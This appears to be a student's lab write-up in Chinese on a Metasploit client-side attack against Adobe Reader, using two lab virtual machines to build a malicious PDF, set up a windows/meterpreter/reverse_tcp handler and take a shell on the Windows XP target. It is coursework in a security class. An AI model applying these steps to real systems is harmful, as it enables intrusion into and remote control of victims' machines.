zoukankan      html  css  js  c++  java
  • 20145329 《网络对抗技术》客户端Adobe阅读器渗透攻击

    两台虚拟机:
    kali ip:192.168.96.130
    windows xp sp3 ip:192.168.96.133

    • 1.kali下打开显示隐藏文件

    • 2.在kali终端中开启msfconsole。

    • 3.进入该漏洞模块并设置攻击有效载荷

    • 4.查看需要需要设置的数据,并设置相应的参数

    • 5.查看设置的参数信息

    • 6.打开exploit生成渗透攻击的pdf文件

    • 7.将渗透文件发送到靶机,使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

    • 8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,并设置相关的端口、ip等信息,需要与之前生成渗透文件的设置一样

    • 9.靶机打开pdf文件,攻击机启动exploit

    • 10.sysinfo可以查看到靶机信息(忘了截图)

    • 11.使用ps查看当前进程,并找到explorer.exe的进程号转移到改进程号,输入图shell,获取靶机的shell

  • 相关阅读:
    暂时转换
    内置函数⼆
    day13内置函数⼀
    day12⽣成器和⽣成器表达式
    20181031作业
    20181030函数2
    20181029函数1
    20181026
    20181025
    20181024
  • 原文地址:https://www.cnblogs.com/jdy1453/p/6719839.html
Copyright © 2011-2022 走看看